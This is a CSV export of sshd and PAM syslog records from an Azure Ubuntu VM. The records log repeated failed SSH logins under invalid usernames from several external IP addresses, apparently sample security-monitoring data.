+8951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:19,UbuntuDevEnv,2019-06-25 22:11:19,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 21414:11: Bye Bye [preauth],41197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,21414,,
+8952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:28,UbuntuDevEnv,2019-06-25 22:11:28,auth,UbuntuDevEnv,info,Invalid user hugo from 132.232.40.86 port 45736,41229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hugo,132.232.40.8,45736,,
+8953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:28,UbuntuDevEnv,2019-06-25 22:11:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=132.232.40.86,41229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,132.232.40.8,,0,
+8954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:28,UbuntuDevEnv,2019-06-25 22:11:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:30,UbuntuDevEnv,2019-06-25 22:11:29,auth,UbuntuDevEnv,info,Failed password for invalid user hugo from 132.232.40.86 port 45736 ssh2,41229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hugo,132.232.40.8,45736,,
+8956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:30,UbuntuDevEnv,2019-06-25 22:11:30,auth,UbuntuDevEnv,info,Disconnected from invalid user hugo 132.232.40.86 port 45736 [preauth],41229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hugo,132.232.40.8,45736,,
+8957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:30,UbuntuDevEnv,2019-06-25 22:11:30,auth,UbuntuDevEnv,info,Received disconnect from 132.232.40.86 port 45736:11: Bye Bye [preauth],41229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,132.232.40.8,45736,,
+8958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:55,UbuntuDevEnv,2019-06-25 22:11:54,auth,UbuntuDevEnv,info,Invalid user anu from 139.199.113.140 port 40466,41322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anu,139.199.113.1,40466,,
+8959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:55,UbuntuDevEnv,2019-06-25 22:11:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,41322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+8960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:55,UbuntuDevEnv,2019-06-25 22:11:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:57,UbuntuDevEnv,2019-06-25 22:11:56,auth,UbuntuDevEnv,info,Failed password for invalid user anu from 139.199.113.140 port 40466 ssh2,41322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anu,139.199.113.1,40466,,
+8962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:58,UbuntuDevEnv,2019-06-25 22:11:57,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 40466:11: Bye Bye [preauth],41322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,40466,,
+8963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:58,UbuntuDevEnv,2019-06-25 22:11:57,auth,UbuntuDevEnv,info,Disconnected from invalid user anu 139.199.113.140 port 40466 [preauth],41322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anu,139.199.113.1,40466,,
+8964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:15,UbuntuDevEnv,2019-06-25 22:12:15,auth,UbuntuDevEnv,info,Invalid user user from 152.250.252.179 port 43606,41402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,152.250.252.1,43606,,
+8965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:15,UbuntuDevEnv,2019-06-25 22:12:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,41402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+8966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:15,UbuntuDevEnv,2019-06-25 22:12:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:16,UbuntuDevEnv,2019-06-25 22:12:16,auth,UbuntuDevEnv,info,Invalid user node from 165.22.96.224 port 33356,41411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,node,165.22.96.2,33356,,
+8968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:16,UbuntuDevEnv,2019-06-25 22:12:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:16,UbuntuDevEnv,2019-06-25 22:12:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,41411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:17,UbuntuDevEnv,2019-06-25 22:12:16,auth,UbuntuDevEnv,info,Failed password for invalid user user from 152.250.252.179 port 43606 ssh2,41402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,152.250.252.1,43606,,
+8971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:17,UbuntuDevEnv,2019-06-25 22:12:17,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 43606:11: Bye Bye [preauth],41402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,43606,,
+8972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:17,UbuntuDevEnv,2019-06-25 22:12:17,auth,UbuntuDevEnv,info,Disconnected from invalid user user 152.250.252.179 port 43606 [preauth],41402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,152.250.252.1,43606,,
+8973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:18,UbuntuDevEnv,2019-06-25 22:12:17,auth,UbuntuDevEnv,info,Failed password for invalid user node from 165.22.96.224 port 33356 ssh2,41411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,node,165.22.96.2,33356,,
+8974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:18,UbuntuDevEnv,2019-06-25 22:12:17,auth,UbuntuDevEnv,info,Disconnected from invalid user node 165.22.96.224 port 33356 [preauth],41411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,node,165.22.96.2,33356,,
+8975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:18,UbuntuDevEnv,2019-06-25 22:12:17,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 33356:11: Bye Bye [preauth],41411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,33356,,
+8976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:46,UbuntuDevEnv,2019-06-25 22:12:45,auth,UbuntuDevEnv,info,Invalid user gentry from 212.156.136.114 port 56011,41517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gentry,212.156.136.1,56011,,
+8977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:46,UbuntuDevEnv,2019-06-25 22:12:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:46,UbuntuDevEnv,2019-06-25 22:12:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,41517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:48,UbuntuDevEnv,2019-06-25 22:12:47,auth,UbuntuDevEnv,info,Failed password for invalid user gentry from 212.156.136.114 port 56011 ssh2,41517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gentry,212.156.136.1,56011,,
+8980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:48,UbuntuDevEnv,2019-06-25 22:12:47,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 56011:11: Bye Bye [preauth],41517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,56011,,
+8981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:12:48,UbuntuDevEnv,2019-06-25 22:12:47,auth,UbuntuDevEnv,info,Disconnected from invalid user gentry 212.156.136.114 port 56011 [preauth],41517,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gentry,212.156.136.1,56011,,
+8982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:13:59,UbuntuDevEnv,2019-06-25 22:13:58,auth,UbuntuDevEnv,info,Invalid user ming from 165.22.96.224 port 51920,41768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ming,165.22.96.2,51920,,
+8983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:13:59,UbuntuDevEnv,2019-06-25 22:13:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:13:59,UbuntuDevEnv,2019-06-25 22:13:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,41768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:14:01,UbuntuDevEnv,2019-06-25 22:14:00,auth,UbuntuDevEnv,info,Failed password for invalid user ming from 165.22.96.224 port 51920 ssh2,41768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ming,165.22.96.2,51920,,
+8986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:14:01,UbuntuDevEnv,2019-06-25 22:14:01,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 51920:11: Bye Bye [preauth],41768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,51920,,
+8987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:14:01,UbuntuDevEnv,2019-06-25 22:14:01,auth,UbuntuDevEnv,info,Disconnected from invalid user ming 165.22.96.224 port 51920 [preauth],41768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ming,165.22.96.2,51920,,
+8988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:14:17,UbuntuDevEnv,2019-06-25 22:14:16,auth,UbuntuDevEnv,info,Invalid user nkinyanjui from 212.156.136.114 port 55176,41844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nkinyanjui,212.156.136.1,55176,,
+8989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:14:17,UbuntuDevEnv,2019-06-25 22:14:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:14:17,UbuntuDevEnv,2019-06-25 22:14:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,41844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:14:19,UbuntuDevEnv,2019-06-25 22:14:18,auth,UbuntuDevEnv,info,Failed password for invalid user nkinyanjui from 212.156.136.114 port 55176 ssh2,41844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nkinyanjui,212.156.136.1,55176,,
+8992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:14:19,UbuntuDevEnv,2019-06-25 22:14:19,auth,UbuntuDevEnv,info,Disconnected from invalid user nkinyanjui 212.156.136.114 port 55176 [preauth],41844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nkinyanjui,212.156.136.1,55176,,
+8993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:14:19,UbuntuDevEnv,2019-06-25 22:14:19,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 55176:11: Bye Bye [preauth],41844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,55176,,
+8994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:17,UbuntuDevEnv,2019-06-25 22:15:17,auth,UbuntuDevEnv,info,Invalid user sanjeev from 152.250.252.179 port 37996,42082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sanjeev,152.250.252.1,37996,,
+8995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:17,UbuntuDevEnv,2019-06-25 22:15:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:17,UbuntuDevEnv,2019-06-25 22:15:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,42082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+8997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:19,UbuntuDevEnv,2019-06-25 22:15:19,auth,UbuntuDevEnv,info,Failed password for invalid user sanjeev from 152.250.252.179 port 37996 ssh2,42082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sanjeev,152.250.252.1,37996,,
+8998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:20,UbuntuDevEnv,2019-06-25 22:15:19,auth,UbuntuDevEnv,info,Disconnected from invalid user sanjeev 152.250.252.179 port 37996 [preauth],42082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sanjeev,152.250.252.1,37996,,
+8999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:20,UbuntuDevEnv,2019-06-25 22:15:19,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 37996:11: Bye Bye [preauth],42082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,37996,,
+9000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:41,UbuntuDevEnv,2019-06-25 22:15:41,auth,UbuntuDevEnv,info,Invalid user radio from 165.22.96.224 port 42206,42225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,165.22.96.2,42206,,
+9001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:41,UbuntuDevEnv,2019-06-25 22:15:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,42225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+9002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:41,UbuntuDevEnv,2019-06-25 22:15:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:43,UbuntuDevEnv,2019-06-25 22:15:43,auth,UbuntuDevEnv,info,Failed password for invalid user radio from 165.22.96.224 port 42206 ssh2,42225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,165.22.96.2,42206,,
+9004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:44,UbuntuDevEnv,2019-06-25 22:15:43,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 42206:11: Bye Bye [preauth],42225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,42206,,
+9005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:44,UbuntuDevEnv,2019-06-25 22:15:43,auth,UbuntuDevEnv,info,Disconnected from invalid user radio 165.22.96.224 port 42206 [preauth],42225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,165.22.96.2,42206,,
+9006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:50,UbuntuDevEnv,2019-06-25 22:15:49,auth,UbuntuDevEnv,info,Invalid user ubuntu from 212.156.136.114 port 38850,42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,212.156.136.1,38850,,
+9007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:50,UbuntuDevEnv,2019-06-25 22:15:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:50,UbuntuDevEnv,2019-06-25 22:15:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:52,UbuntuDevEnv,2019-06-25 22:15:52,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 212.156.136.114 port 38850 ssh2,42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,212.156.136.1,38850,,
+9010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:52,UbuntuDevEnv,2019-06-25 22:15:52,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 38850:11: Bye Bye [preauth],42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,38850,,
